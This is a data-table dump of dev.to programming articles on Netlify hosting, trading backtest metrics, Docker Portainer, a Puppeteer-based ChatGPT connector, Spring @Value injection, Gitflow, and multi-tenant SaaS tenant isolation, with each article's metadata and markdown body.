id int64 5 1.93M | title stringlengths 0 128 | description stringlengths 0 25.5k | collection_id int64 0 28.1k | published_timestamp timestamp[s] | canonical_url stringlengths 14 581 | tag_list stringlengths 0 120 | body_markdown stringlengths 0 716k | user_username stringlengths 2 30 |
|---|---|---|---|---|---|---|---|---|
1,878,691 | How to Host Website on Netlify for FREE | Hosting a website on Netlify is a straightforward process. Here are the steps to get your site up and... | 0 | 2024-06-06T02:44:38 | https://dev.to/codevicky/launch-your-website-in-minutes-a-beginners-guide-to-hosting-on-netlify-1f28 | netlify, webhosting, hosting, tutorial | Hosting a website on Netlify is a straightforward process. Here are the steps to get your site up and running:
### Create a Netlify Account:
Go to [Netlify's website](https://www.netlify.com/) and sign up for a free account if you don't have one.
[](https://www.netlify.com/)
### Connect Your Git Repository:
- After logging in, click on "New site from Git".
- Connect to your Git provider `(GitHub, GitLab, or Bitbucket)` and authorize Netlify to access your repositories.
### Choose Your Repository:
- Select the repository that contains your website code.
- Netlify will automatically detect the build settings. If it doesn't, you can specify the build command and the publish directory `(e.g., npm run build and dist).`
### Build and Deploy:
- Click `"Deploy site"` Netlify will start the build process and deploy your website.
- Once the build is complete, Netlify will provide you with a temporary URL where your site is live.
### Custom Domain (Optional):
- If you have a custom domain, you can add it to your Netlify site.
- Go to `"Domain settings"` in your site's dashboard.
- Click on `"Add custom domain"` and follow the instructions to configure your DNS settings.
### Continuous Deployment:
- Every time you push changes to your repository, Netlify will automatically rebuild and redeploy your site.
### Additional Features:
- **Form Handling:** Netlify offers built-in form handling without any backend code.
- **Redirects and Rewrites:** You can configure redirects and rewrites using a `_redirects` file or `netlify.toml.`
- **Environment Variables:** You can set environment variables for your build process in the site settings.
- **Functions:** Netlify supports serverless functions that can be used for dynamic back-end processing.
### Example:
Here’s an example for deploying a simple static HTML site:
- Create a repository on GitHub and push your site’s code to it.
- Connect the repository to Netlify as described above.
- Since it’s a static site, you might not need any build command. You can directly specify the publish directory where your HTML files are located.
- Deploy and check your site.
That’s it! Your site should now be live on Netlify.
| codevicky |
1,878,683 | How to read the strategy backtest performance report | Today's market analysis platforms allow traders to quickly review a trading system. Whether looking... | 0 | 2024-06-06T02:25:56 | https://dev.to/fmzquant/how-to-read-the-strategy-backtest-performance-report-197b | backtest, trading, fmzquant, strategy | Today's market analysis platforms allow traders to quickly review a trading system. Whether looking at hypothetical results or actual trading data, there are hundreds of performance metrics that can be applied. These performance metrics are typically displayed in a strategy performance report, a compilation of data based on different mathematical aspects of a system's performance. Knowing what to look for in a strategy performance report can help traders analyze a system's strengths and weaknesses.
A strategy performance report is an objective evaluation of a trading system's performance. Traders can create strategy performance reports to analyze their actual trading results. A set of trading rules can also be applied to historical data to determine how the system would have performed during the specified period—a process called backtesting. Most market analysis platforms allow traders to create a strategy performance report during backtesting, a valuable tool for traders wishing to test a trading system before putting it to use in the market.
## Elements of a Strategy Performance Report
The "front page" of a strategy performance report is the performance summary. Figure 1 shows an example of a performance summary that includes a variety of performance metrics. The metrics are listed on the left side of the report; the corresponding calculations are found on the right side, separated into columns. The five key metrics of the report are underlined; we'll discuss them in detail later.

Figure 1 - The "front page" of a strategy performance report is the performance summary. The key metrics identified in this article appear underlined.
In addition to the performance summary seen in Figure 1, strategy performance reports may also include trade lists, periodical returns, and performance graphs. The trade list provides an account of each trade that was taken, including information such as the type of trade (long or short), the date and time, price, net profit, cumulative profit, and percent profit. The trade list allows traders to see exactly what happened during each trade.
Viewing the periodical returns for a system allows traders to see performance broken down into daily, weekly, monthly, or annual segments. This section is helpful in determining profits or losses for a specific time period. Traders can quickly assess how a system is performing on a daily, weekly, monthly, or annual basis. It is important to remember that in trading, it is the cumulative profits (or losses) that matter. Looking at one trading day or one trading week is not as significant as looking at the monthly and yearly data.
One of the quickest methods of analyzing strategy performance is the performance graph. This shows the trade data in a variety of ways, from a bar graph showing a monthly net profit to an equity curve. Either way, the performance graph provides a visual representation of all the trades in the period, allowing traders to quickly ascertain whether or not a system is performing up to standards. Figure 2 shows two performance graphs: one as a bar chart of monthly net profit; the other as an equity curve.

Figure 2 - Each performance graphs represents the same trade data shown in different formats.
## Key Metrics of a Strategy Performance Report
A strategy performance report may contain a tremendous amount of information regarding a trading system's performance. While all of the statistics are important, it's helpful to narrow the initial scope to five key performance metrics:
- Total Net Profit
- Profit Factor
- Percent Profitable
- Average Trade Net Profit
- Maximum Drawdown
These five metrics provide a good starting point for testing a potential trading system or evaluating a live trading system.
### Total Net Profit
The total net profit represents the bottom line for a trading system over a specified period of time. This metric is calculated by subtracting the gross loss of all losing trades (including commissions) from the gross profit of all winning trades. The formula would be:

So, in Figure 1, the total net profit is calculated as:

While many traders use total net profit as the primary means to measure trading performance, the metric alone can be deceptive. By itself, this metric cannot determine if a trading system is performing efficiently, nor can it normalize the results of a trading system based on the amount of risk that is sustained. While certainly a valuable metric, total net profit should be viewed in concert with other performance metrics.
### Profit Factor
The profit factor is defined as the gross profit divided by the gross loss (including commissions) for the entire trading period. This performance metric relates the amount of profit per unit of risk, with values greater than one indicating a profitable system. As an example, the strategy performance report shown in Figure 1 indicates the tested trading system has a profit factor of 1.98. This is calculated by dividing the gross profit by the gross loss:
$149,020 ÷ $75,215 = 1.98
This is a reasonable profit factor and signifies that this particular system produces a profit. We all know that not every trade will be a winner and that we will have to sustain losses. The profit factor metric helps traders analyze the degree to which wins are greater than losses.
$149,020 ÷ $159,000 = 0.94
The above equation shows the same gross profit as the first equation but substitutes a hypothetical value for the gross loss. In this case, the gross loss is greater than the gross profit, resulting in a profit factor that is less than one. This would be a losing system.
### Percent Profitable
The percent profitable metric is also known as the probability of winning. This metric is calculated by dividing the number of winning trades by the total number of trades for a specified period. As an equation:

In the example shown in Figure 1, the percent profitable would be:
102 (winning trades) ÷ 163 (total # of trades) = 62.58% (percent profitable)
The ideal value for the percent profitable metric will vary depending on the trader's style. Traders who typically go for larger moves, with greater profits, only require a low percent profitable value to maintain a winning system, because the trades that do win—that are profitable, that is—are usually quite large. This typically happens with the strategy known as trend trading. Those that follow this approach often find that as few as 40% of trades might make money and still produce a very profitable system because the trades that do win follow the trend and typically achieve large gains. The trades that do not win are usually closed for a small loss.
Intraday traders, and particularly scalpers, who look to gain a small amount on any one trade while risking a similar amount will require a higher percent profitable metric to create a winning system. This is due to the fact that the winning trades tend to be close in value to the losing trades; in order to "get ahead" there needs to be a significantly higher percent profitable. In other words, more trades need to be winners, since each win is relatively small.
### Average Trade Net Profit
The average trade net profit is the expectancy of the system: It represents the average amount of money that was won or lost per trade. The average trade net profit is calculated by dividing the total net profit by the total number of trades. As an equation:

In our example from Figure 1, the average trade net profit would be:
**$73,805 (total net profit) ÷ 166 (total # of trades) = $452.79 (average trade net profit)**
In other words, over time we could expect that each trade generated by this system will average $452.79. This takes into consideration both winning and losing trades since it is based on the total net profit.
This number can be skewed by an outlier, a single trade that creates a profit (or loss) many times greater than a typical trade. An outlier can create unrealistic results by overinflating the average trade net profit. One outlier can make a system appear significantly more (or less) profitable than it is statistically. The outlier can be removed to allow for more precise evaluation. If the success of the trading system in backtesting depends on an outlier, the system needs to be further refined.
### Maximum Drawdown
The maximum drawdown metric refers to the "worst case scenario" for a trading period. It measures the greatest distance, or loss, from a previous equity peak. This metric can help measure the amount of risk incurred by a system and determine if a system is practical, based on account size. If the largest amount of money that a trader is willing to risk is less than the maximum drawdown, the trading system is not suitable for the trader. A different system, with a smaller maximum drawdown, should be developed.
This metric is important because it is a reality check for traders. Just about any trader could make a million dollars—if they could risk 10 million. The maximum drawdown metric needs to be in line with the trader's risk tolerance and trading account size.
## The Bottom Line
Strategy performance reports, whether applied to historical or live trading results, can provide a powerful tool for assisting traders in evaluating their trading systems. While it is easy to pay attention to just the bottom line or total net profit (we all want to know how much money we're making), considering additional performance metrics can provide a more comprehensive view of a system's efficacy—and its ability to achieve our trading goals.
From: https://blog.mathquant.com/2019/05/09/5-3-how-to-read-the-strategy-backtest-performance-report.html | fmzquant |
1,878,687 | Is there any service extracts important keywords through text | Hello, it's my first post on dev community. I'm finding some service or tools, extracts important... | 0 | 2024-06-06T02:38:37 | https://dev.to/modjm/is-there-any-service-extracts-important-keywords-through-text-402o | llm, learning, gpt3 | Hello, it's my first post on dev community.
I'm finding some service or tools, extracts important keywords through text. It would be better if you could support Korean.
I appreciate any thoughts, good references and guides! Thanks in advance!
| modjm |
1,878,686 | Docker + Portainer | Tool for management of container in Docker. Get container pull. docker pull... | 0 | 2024-06-06T02:27:13 | https://dev.to/thiagoeti/docker-portainer-kd0 | docker, portainer | Tool for management of container in Docker.
#### Get container **pull**.
```console
docker pull "portainer/portainer"
```
#### Create **volume** for data.
```console
docker volume create "portainer"
ln -s "/var/lib/docker/volumes/portainer" "/data/volume/"
```
#### Create and **run** container.
```console
docker run --name "portainer" \
-p 9000:9000 \
-v "/var/run/docker.sock:/var/run/docker.sock" \
-v "portainer":"/data" \
--restart=always \
-d "portainer/portainer"
```
#### Start container.
```console
docker start "portainer"
```
#### Insert user and password in first access.
```console
user: portainer
password: ***
```
> Important: if not first access machine in 5 minutes expire
---
[https://github.com/thiagoeti/docker-portainer](https://github.com/thiagoeti/docker-portainer) | thiagoeti |
1,878,685 | Automatizando ChatGPT con un servicio REST en Express y Puppeteer | Introducción ¿Te imaginas interactuar con ChatGPT a través de un servicio REST simple y... | 0 | 2024-06-06T02:27:01 | https://dev.to/miguelcespedes/automatizando-chatgpt-con-un-servicio-rest-en-express-y-puppeteer-585n | ## Introducción
¿Te imaginas interactuar con ChatGPT a través de un servicio REST simple y poderoso? ¡Con [ChatGPT-Connector](https://github.com/miguelcespedes/ChatGPT-Connector) , lo haces posible! Este proyecto te ofrece una aplicación Node.js y una clase ChatGPTConnector para que puedas enviar indicaciones a ChatGPT y obtener respuestas automáticas.

**Descripción del proyecto**
Este proyecto proporciona una aplicación Node.js y una clase `ChatGPTConnector` que te permite interactuar con ChatGPT y obtener respuestas a tus indicaciones.
**Estructura del proyecto**
El proyecto está estructurado de la siguiente manera:
```
ChatGPT-Connector
├── package.json
└── src
├── app.js
└── ChatGPTConnector.js
```
* `package.json` : El archivo de configuración principal del proyecto, que incluye dependencias, scripts y otros metadatos.
* `src` : El directorio fuente que contiene el código JavaScript de la aplicación.
* `app.js` : El archivo principal de la aplicación Express.js, que maneja el enrutamiento y la interacción con `ChatGPTConnector`.
* `ChatGPTConnector.js` : La clase responsable de conectarse a ChatGPT, enviar indicaciones y obtener respuestas utilizando Puppeteer.
**Instalación**
Para instalar y ejecutar el proyecto, sigue estos pasos:
**Prerrequisitos:**
* Asegúrate de tener Node.js y npm instalados en tu sistema.
**Instalación de dependencias:**
1. Navega al directorio del proyecto.
2. Ejecuta el siguiente comando para instalar las dependencias requeridas:
```bash
npm install
```
Esto instalará la dependencia `puppeteer`, que se utiliza para automatizar las interacciones web con ChatGPT.
**Ejecución de la aplicación:**
Para iniciar el servidor Express.js y hacer que la aplicación sea accesible, ejecuta el siguiente comando:
```bash
npm start
```
Esto iniciará el servidor en el puerto 80 de forma predeterminada. Puedes acceder al punto final `http://localhost/client` para enviar indicaciones a ChatGPT y recibir respuestas.
**Uso**
Para usar el proyecto, puedes enviar solicitudes HTTP GET al punto final `/client` con el parámetro `prompt` que contiene el texto que deseas enviar a ChatGPT. Por ejemplo:
```bash
curl -X GET http://localhost/client?prompt=Hola,%20que%20hora%20ser%C3%A1%20en%20Par%C3%ADs?
```
Esto enviará la indicación "Hola, que hora será en París?" a ChatGPT y devolverá la respuesta en la respuesta.
**Notas adicionales**
* La clase `ChatGPTConnector` está configurada actualmente para usar Puppeteer en modo visible. Es posible que debas ajustar la configuración del modo sin cabeza según tus preferencias.
* Asegúrate de tener una cuenta de ChatGPT y estar conectado antes de usar la aplicación.
* El código proporcionado es un ejemplo básico y se puede ampliar para manejar interacciones y escenarios de error más complejos.
**Siéntete libre de modificar y adaptar el proyecto para que se adapte a tus necesidades y requisitos específicos.**
| miguelcespedes | |
1,875,430 | How I Approach Tutorials To Avoid Tutorials Hell | Tutorials hell is floozy for luck of a better word. You are in an endless circle of tutorials, you... | 0 | 2024-06-06T02:27:00 | https://dev.to/thekarlesi/how-i-approach-tutorials-to-avoid-tutorials-hell-jbn | webdev, javascript, beginners, programming | Tutorials hell is floozy for luck of a better word.
You are in an endless circle of tutorials, you are not learning anything, you are not getting anything done, you are not getting any better, you are not getting any closer to your goal.
You are just stuck in a loop of tutorials. You are in tutorials hell.
In order to avoid tutorial hell, here are some tips I have learned over the years.
### Build small projects
A good way to avoid tutorial hell is to build small projects.
After watching a tutorial, build a small project based on what you have learned.
This will help you to solidify your knowledge and to avoid tutorials hell.
A trick I use when following a tutorial is to pause the video after every step and try to do the step myself.
This will help you to solidify your knowledge and to avoid tutorials hell.
Another way is to have a project in mind and follow a tutorial to build that project.
I can incorporate my learnings from different tutorials to build my project.
### Read the documentation'
Another way to avoid tutorials hell is to read the documentation. The documentation is the best source of information.
It is the most accurate and up to date.
When stuck on a problem, I always try to find the answer in the documentation if I can't find it in a tutorial.
The documentation also expounds on the concepts in a tutorial.
This enables you to have a wide understanding of the topic.
### Teach yourself and others
Joseph Joubert says that, "to teach is to learn twice."
Teaching others is a form of solidifying your knowledge.
When you teach others, you identify the gaps in your knowledge.
This enables you to fill those gaps. In the process, you learn more.
### Write technical blogs
Writing is the best way you can use to teach others.
There are many platforms you can use to write technical blogs.
You can write technical blogs on Medium, Dev.to, Hashnode, etc.
You get to build your portfolio and you get to solidify your knowledge.
Talk about killing two birds with one stone 😊.
See you in the next post.
Happy Coding!
Karl
P.S. If you liked this post, subscribe to [my newsletter](karlgusta.substack.com) to boost your career. | thekarlesi |
1,878,628 | Are multi-tenant apps = SaaS? | Should all SaaS apps employ multi-tenancy architectures? Can multi-tenancy architectures be applied... | 27,604 | 2024-06-06T01:43:03 | https://blog.logto.io/are-multi-tenant-apps-equal-saas/ | webdev, saas, opensource, identity | Should all SaaS apps employ multi-tenancy architectures? Can multi-tenancy architectures be applied to consumer apps?
---
# Multi-tenant apps’ broader definition
In the [last chapter](https://dev.to/logto/tenancy-models-for-a-multi-tenant-app-3429), we discussed multi-tenancy in a general sense. To summarize, when we refer to a multi-tenant app, it doesn't necessarily mean the app adheres to one architectural model; it might utilize various tenancy strategies, indicating that at least some of its components are shared.
In this chapter, we'll explore multi-tenant apps from a business and product standpoint.
# Types of multi-tenant apps in business
### SaaS
Multi-tenant apps often find their place in business-to-business (B2B) solutions like productivity tools, enterprise resource planning (ERP) systems, and other software-as-a-service (SaaS) products. In this context, each "tenant" typically represents a business customer, which could have multiple users (its employees). Additionally, a business customer might have multiple tenants to represent distinct organizations or business divisions.

### Generic B2B use cases
B2B applications go beyond SaaS products and often involve the use of multi-tenant apps. In B2B contexts, these apps serve as a common platform for various teams, business clients, and partner companies to access your applications.
For instance, consider a ride-sharing company that provides both B2C and B2B apps. The B2B apps serve multiple business clients, and employing a multi-tenant architecture can help the management of their employees and resources. To illustrate, if the company wishes to maintain a unified user identity system, it can design an architecture like the following example:
Let's use Sarah as an example. Sarah has both a personal and a business identity. She uses the ride-sharing service as a passenger and also works as a driver in her spare time. In her professional role, she is associated with Company A, but she also manages her own personal business.

# The importance of multi-tenancy in SaaS
If you've been following the information above, you now have the answers you need. SaaS, or software as a service, is a concept defined from a business model viewpoint. Multi-tenancy, on the other hand, is a software architecture applicable in various situations, whether in SaaS or other B2B contexts.
The mix-up between SaaS and multi-tenancy often arises due to a widely recognized industry belief: when you're aiming for enterprise clients, adopting a multi-tenant approach is a must-have approach.
This emphasis on multi-tenancy is rooted in its substantial role in addressing the complexities that come with serving enterprises, offering valuable solutions from various angles.
### Scaling with multi-tenancy
For enterprise businesses, multi-tenancy is the key to effectively fulfilling their requirements for availability, resource management, cost management, and data security. On a technical level, adopting a multi-tenant approach streamlines your development processes, minimizes technical challenges, and promotes seamless expansion.
### Creating a unified experience
When examining the roots of SaaS products, it's akin to a building housing various apartments. All tenants share common utilities like water, electricity, and gas, yet they maintain independent control over managing their own space and resources. This approach simplifies property management.
Think of your SaaS product as this building. Instead of having separate agents for each unit, some components or units can offer a unified experience shared by all tenants. This is more efficient than individually crafting and managing each room. The multi-tenancy architecture offers advantages for both your business operation and your customers.
### Ensuring security through tenant isolation
When discussing multi-tenant applications, it's important to delve into the concept of tenant isolation. In a multi-tenancy architecture, the term "tenant" is introduced to create boundaries that separate and secure the resources and data of different tenants within a shared instance. This ensures that each tenant's data and operations remain distinct and secure, even if they are utilizing the same underlying resources.
In the context of SaaS, multi-tenant architecture employs mechanisms that tightly control access to resources and prevent any unauthorized attempts to access another tenant's resources.
The concept of tenant isolation might seem abstract and unclear. In the next chapter, we'll use examples and key points to provide a more detailed understanding of the principles and mindsets behind tenant isolation.
{% cta https://logto.io/?ref=dev %} Try Logto Cloud for free {% endcta %}
| palomino |
1,878,638 | 12 Ways to Use the @Value Annotation in Spring for Flexible and Maintainable Applications | You may already be familiar with @Value annotation from Spring. This annotation allows you to inject... | 27,602 | 2024-06-06T02:17:28 | https://springmasteryhub.com/2024/06/05/12-ways-to-use-the-value-annotation-in-spring-for-flexible-and-maintainable-applications/ | java, spring, tutorial, programming |
You may already be familiar with @Value annotation from Spring. This annotation allows you to inject some properties into your beans.
But there’s a lot of ways you could do that. And maybe you are not familiar with all of them.
This article will show you many ways to work with @Value and some new ways you can apply to your projects.
Let’s explore our options!
### 1. Basic property injection
This is the most used option in Spring projects. It’s the common way you can control feature flags, API keys, database connection details, etc.
Example:
```java
@Value("${feature.enableDarkMode}")
private boolean isDarkModeEnabled;
```
Properties:
```java
feature.enableDarkMode=true
```
### 2. Hardcoded Values:
This way set the value as a constant in your code, this way you cannot change it externally.
```java
@Value("localhost")
private String defaultServerAddress;
```
### 3. Constructor Injection
Here is to create immutable beans that need their dependencies and values upfront.
Example:
```java
public TestBean(@Value("${mail.smtp.server}") String smtpServer) {
this.smtpServer = smtpServer;
}
```
Properties:
```java
mail.smtp.server=smtp.example.com
```
### 4. SetUp Default Values:
You can provide default values when injecting your properties to avoid application crashes. If you do not have the property set, it will automatically pick the default value.
Example:
```java
@Value("${app.cache.ttl:60}") // Default TTL of 60 seconds if not configured
private int cacheTimeToLive;
```
### 5. Inject Using Set Method (Less common)
This is an option in some legacy code bases, where construction is not possible, this way of injection becomes an option.
Example:
```java
@Value("${log.level}")
public void setLogLevel(String logLevel) {
this.logLevel = logLevel;
}
```
Properties:
```java
log.level=INFO
```
### 6. Injecting an Array of values:
You can set an array of values, using comma-separated values, Spring will automatically split values and put them in the array positions. You can use this to set an array of allowed origins configured by properties.
Example:
```java
@Value("${cors.allowedOrigins}")
private String[] allowedOrigins;
```
Properties:
```java
cors.allowedOrigins=https://example1.com,https://example2.com
```
### 7. Injecting a List of Values:
If you want more flexibility in your Java code, injecting a collection of values you can use SpEL to split values to create the list.
Example:
```java
@Value("#{'${notification.channels}'.split(',')}")
private List<String> notificationChannels;
```
Properties:
```java
notification.channels=EMAIL,SMS,PUSH
```
### 8. Inject Maps
You can inject in a Java map a group of configurations that uses key-value pattern.
Example:
```java
@Value("#{${http.client.config}}")
private Map<String, Integer> httpClientConfig;
```
Properties:
```java
http.client.config={timeout: 500, maxConnections: 100}
```
### 9. Inject a Single Value From a Map
In the same way, you can inject an entire map of values, you can use SpEL to inject a single value using its key.
Example:
```java
@Value("#{${http.client.config}['timeout']}")
private int timeout;
```
Properties:
```java
http.client.config={timeout: 500, maxConnections: 100}
```
### 10. Access System Properties
This method will allow you to get the system properties from the Java properties, also it gets all the properties that you set when running the application with the -D parameter.
Example:
```java
@Value("#{systemProperties['java.home']}")
private String javaHome;
```
In this example, the `java.home` is already passed automatically to the process. But if you want to access some custom property you can do this:
```java
@Value("#{systemProperties['custom.property']}")
private String javaHome;
```
Running the project with custom property:
```java
java -Dcustom.property="value" -jar app.jar
```
### 11. Get Environment Variables:
You can read an environment variable from your system (if the application has access to the variable).
Example:
```java
@Value("#{environment['MY_ENV_VAR']}")
private String myEnvVar;
```
### 12. Use SpEL and Create Dynamic Properties
One common problem developers have is that the team members can be working on different OS, so you can create a dynamic property based on the system to make things more flexible.
Example:
```java
@Value("#{systemProperties['os.name'].toLowerCase().contains('windows') ? 'C:\\' : '/'}")
private String rootDirectory;
```
This will get the [os.name](http://os.name) from the system and decide what is the root directory to inject the value.
That’s it! Now you have a whole set of new ways to configure your Spring applications with @Value!
That will give you more flexibility and options. It will offer a solution that fills your needs. By understanding how it works you can write more maintainable Spring applications.
Test out new ways of Injecting properties into your project!
If you like this topic, make sure to follow me, in the following days, I’ll be explaining more about the Spring annotations!
Stay tuned!
### References
1. [Baeldung: Spring @Value Annotation](https://www.baeldung.com/spring-value-annotation)
2. [Spring Framework Documentation: @Value Annotations](https://docs.spring.io/spring-framework/reference/core/beans/annotation-config/value-annotations.html)
3. [DigitalOcean: Spring @Value Annotation](https://www.digitalocean.com/community/tutorials/spring-value-annotation) | tiuwill |
1,878,636 | Level-up Your Git Projects with Gitflow | Take your project’s design and evolution to the next level by integrating Gitflow into your... | 0 | 2024-06-06T02:10:34 | https://dev.to/dedsyn4ps3/how-i-leveled-up-my-github-projects-with-gitflow-25k | programming, productivity, git, tooling | ## Take your project’s design and evolution to the next level by integrating Gitflow into your development process!

### In the Beginning
I’m fairly certain that many of you reading this are plenty familiar with the fantastic ecosystem that is Git, as well as some of the gigantic version control platforms such as Github and GitLab. That being said, there could still be some newbie programmers reading this article, and may need a quick primer on what Git is…so here’s your brief explanation:
> Git is a version control system that allows you to manage and keep track of your source code history. It’s like a time machine for your code, enabling you to save snapshots of your changes and collaborate with others. GitHub, on the other hand, is a cloud-based hosting service specifically designed for managing Git repositories. It provides a platform where developers can store, create, manage, and collaborate on code.
As I’m sure many of you can relate, getting new projects up and running can be a challenge…and I’m just talking about drafting out and writing the code! Like a lot of us come to find out, managing a codebase can be quite a bit more involved than one might think:
- First, you initialize your new repo and link it to a remote branch (if doing it locally)
- Then, you start writing some code…easy right?
- Next thing you know, your project is growing, new ideas emerge to add to the project…and of course, the occasional bug or hot-fix that may be necessary!
- Finally, you keep making changes bit by bit, then commit and push the changes to your remote, with the occasional tag here and there…then repeat…
**If the codebase isn’t all that large or complex, following such a straightforward development approach is more than likely going to be okay.** But what happens if you’re creative juices are flowing and your once-small project now becomes more of a thriving repo with the potential for other collaborators to get involved, or perhaps you begin planning on packaging and distributing the code as it becomes more developed?
### Enter Workflows
**Lucky for us, there are several solutions for dealing with projects that grow in scope and complexity!** We'll be focusing primarily on one of these solutions, which has become a key piece in my own improved development life-cycle (as well as countless other developers). Before we dive into it, let's have a quick introduction into what all we're talking about here...

Some of you may or may not be familiar with the term workflow when it comes to project development strategy. I'm sure it rings a bell for many of you, whether you know exactly what it is or not:
> A workflow is an end-to-end process that...move[s] data (tasks) through a series of steps from initiation to completion. Once it’s set up, a workflow helps you organize information in a way that is not only understandable, but also repeatable.1
**When it comes to Git project development, there are three popular workflows that are typically implemented by developers and teams:**
- Centralized
- Feature Branch
- Gitflow
Each of these has their own pros and cons, and for many are reliable ways to effectively build and maintain projects. **Many of you will more than likely identify with using at least one of these workflows in your day to day coding experiences, even if you never knew it!**
1. **Centralized Workflow:**
- Uses a central repository (often named **main**) as the single point of entry for all changes.
- Developers commit directly to the **main** branch.
- Advantages: Simple and easy to understand.
2. **Feature Branch Workflow:**
- Developers create separate branches for individual features or bug fixes.
- Each feature branch is isolated and independent.
- After development, feature branches are merged back into the **`main`** branch.
- Advantages: Branch isolation as well as parallel development ability.
3. **Gitflow Workflow:**
- Extends the feature branch workflow.
- Introduces additional branches: **`develop`** (for ongoing development) and **`release`** (for release candidates).
- Feature branches are created from **`develop`** (or **`dev`**), and **`hotfix`** branches are based on **main**.
- Advantages: Clear structure, well-defined roles for branches, and support for both features and releases.
### Implementing Gitflow
How many of you immediately identified with a particular workflow after reading the previous section? I have a feeling many of you relate to using the first style of workflow, which is totally fine! What I hope to do here is expand your understanding of other common flows, in the event that your projects grow or you simply want a more organized structure for all your code.
Like many developers, I too was consistently using a Centralized Workflow for quite a long time. Once my projects started becoming significantly more complex, it became clear that a new flow had to be implemented...and the flow that worked best (and **continues** to work great) for these projects was **Gitflow**!
Getting started is pretty straightforward and painless for most, especially if you have _full control_ of your git repo (which from this point on, I will assume you have). There are only a handful of required actions that need taken when setting the flow up, **many of which can be done automatically depending on the code management platform you're using.**

As you can see in the above image, desktop Git applications such as **`GitKraken`** offer built-in Gitflow integration, making it extremely easy to implement Gitflow in your projects!
**My personal preference is to use GitKraken for all my desktop-based code management, though you're free to utilize whichever platform works well for you...**

If for some reason your desktop Git client doesn’t have the option to enable Gitflow, or perhaps you prefer sticking with the terminal…have no fear! There's a dedicated **`git-flow`** extension available to install using your system's package manager!
**Once installed, you can just as easily enable the flow in an existing repository or when creating a new one...**
```bash
# For Debian/Ubuntu Distros
sudo apt install -y git-flow
# For Archlinux
yay -S gitflow-avh
# Using Homebrew
brew install git-flow
```
### Putting it Together
Once we have either enabled Gitflow functionality in our desktop Git client, or installed it locally using our system’s package manager, it’s time to actually put it to use!
Using a desktop client such as GitKraken works out to be the simplest option, since all we need to do is enable it in our repository’s settings tab, and define what we want the various branches to be named. Once that’s done, we’re off to the races!
**When following the manual approach to things, we first need to initialize the flow in our repo and define what our various branches should be called using the `git-flow` CLI:**
```shell
# Enable Gitflow in our project
> git flow init
No branches exist yet. Base branches must be created now.
Branch name for production releases: [master] main
Branch name for "next release" development: [develop] dev
How to name your supporting branch prefixes?
Feature branches? [feature/] feat
Release branches? [release/]
Hotfix branches? [hotfix/] fix
Support branches? [support/]
Version tag prefix? []
```
Now that our new flow is enabled, we can go about developing our code as we normally would…for the most part! Remember, the whole purpose of implementing a Gitflow-styled development process is to better compartmentalize the various stages of the entire process:
- The core, stable codebase will always follow the **`main`** branch (or whatever you named it)
- Use the **`dev`** branch to make and push changes as you test and grow your project
- When something doesn’t work right after a **`dev`** commit, use the **`hotfix`** type branch to make corrections and merge into **`dev`**
- After accomplishing a milestone (i.e. finished a new component or code section), merge the current **`dev`** branch into **`main`**
### Any Thoughts?
Some of you may be wondering to yourselves: _**“What’s the point of doing all this?”**_. I’m glad you asked! While it may seem like a bit of extra work to enable and implement different branches in a project, doing so will help keep your code commits organized and overall project more structured than a typical single-branch style repo.
By maintaining such structure in your projects, _**you’ll without a doubt become a better developer that’s much better equipped to work on larger projects down the road**_…be they your own or even an internal corporate project!
**Current and potential employers alike typically appreciate seeing such well-structured code and commit histories that models like Gitflow produce…**

### Get to it!
Now that you have a better understanding of what Gitflow is, and how it can help you become a better developer, get out there and try it out! The important thing to remember is that while not **all** projects need implement such a flow…many of them can and should.
Pick a project that you’ve been working on (or even start a new one), and follow the steps that apply to you to enable Gitflow. Once you do, see what kind of changes you experience while following this workflow!
**Do you find yourself better organizing your commits and code merges as your project grows in complexity? Perhaps you don’t think it makes much of a difference for the project you’re currently working on? It can happen sometimes!**

**1)** Martins, Julia. “Hitting Work Blocks? Try Workflows. [2024].” Asana, Asana, 17 Jan. 2024, asana.com/resources/workflow-examples.
<br>
{% embed https://dev.to/dedsyn4ps3 %} | dedsyn4ps3 |
1,878,632 | Tenant isolation in multi-tenant application | Tenant isolation is a key concept in multi-tenant applications. In this article, we'll discuss what... | 27,604 | 2024-06-06T02:09:37 | https://blog.logto.io/tenant-isolation/ | webdev, identity, saas, opensource | Tenant isolation is a key concept in multi-tenant applications. In this article, we'll discuss what it is and how it can be achieved.
---
Hello everyone! In this chapter, we'll build upon our earlier discussions on multi-tenant topics. If you haven't read the previous articles yet, we recommend starting with those first!
- [Are multi-tenant apps = SaaS?](https://dev.to/logto/are-multi-tenant-apps-saas-1ph1)
- [Tenancy models for a multi-tenant app](https://dev.to/logto/tenancy-models-for-a-multi-tenant-app-3429)
When discussing multi-tenant applications, it's important to think about tenant isolation. This means keeping the data and resources of different tenants separate and secure within a shared system(for example, a cloud infrastructure or a multi-tenant application).
The goal of tenant isolation is to make sure that each tenant's data and operations remain distinct and secure from one another, even when they are using the same underlying resources.
In a Software as a Service (SaaS) scenario, tenant isolation involves creating structures within the SaaS framework that strictly regulate resource access. This prevents any unauthorized attempts to access another tenant's resources.
While the explanation might seem abstract, we'll use examples and key details to further explain the isolation mindset.
# Tenant isolation doesn't go against multi-tenancy's "shared" mindset
That is because tenant isolation is not necessarily an infrastructure resource-level construct. In the realm of multi-tenancy and isolation, some view isolation as a strict division between actual infrastructure resources. This usually leads to a model where each tenant has separate databases, computing instances, accounts, or private clouds. In shared resource scenarios, like multi-tenant apps, the way to achieve isolation can be a logical construct.
Tenant isolation focuses exclusively on using “tenant” context to limit access to resources. It evaluates the context of the current tenant and uses that context to determine which resources are accessible for that tenant. It applies this isolation to all users within that tenant. Any attempt to access a tenant resource should be scoped to just those resources that belong to that tenant.
# Isolation comes in different levels
When we understand that isolation isn't strictly tied to infrastructure resource levels and isn't a clear separation between physical infrastructure, it leads to a conclusion like this:
Instead of viewing isolation as a simple "yes" or "no," consider it as a spectrum. You can set up parts of your system to be more or less isolated based on what you need.
The diagram below illustrates this spectrum of isolation.

# Authentication and authorization are not equal to “isolation”
Using authentication and authorization to control access to your SaaS environments is important, but it's not enough for complete isolation. These mechanisms are just one part of the security puzzle.
People often ask a question, can I use general authorization solutions and role-based access control to achieve tenant isolation? You can build a multi-tenant app but you can’t say you achieved and employed tenant isolation strategies as a best practice. We don’t generally recommend it because
> Tenant isolation is separate from authentication and authorization.
To illustrate, consider a situation where you've set up authentication and authorization for your SaaS system. When users log in, they receive a token containing information about their role, dictating what they can do in the application. This approach boosts security but doesn't ensure isolation.
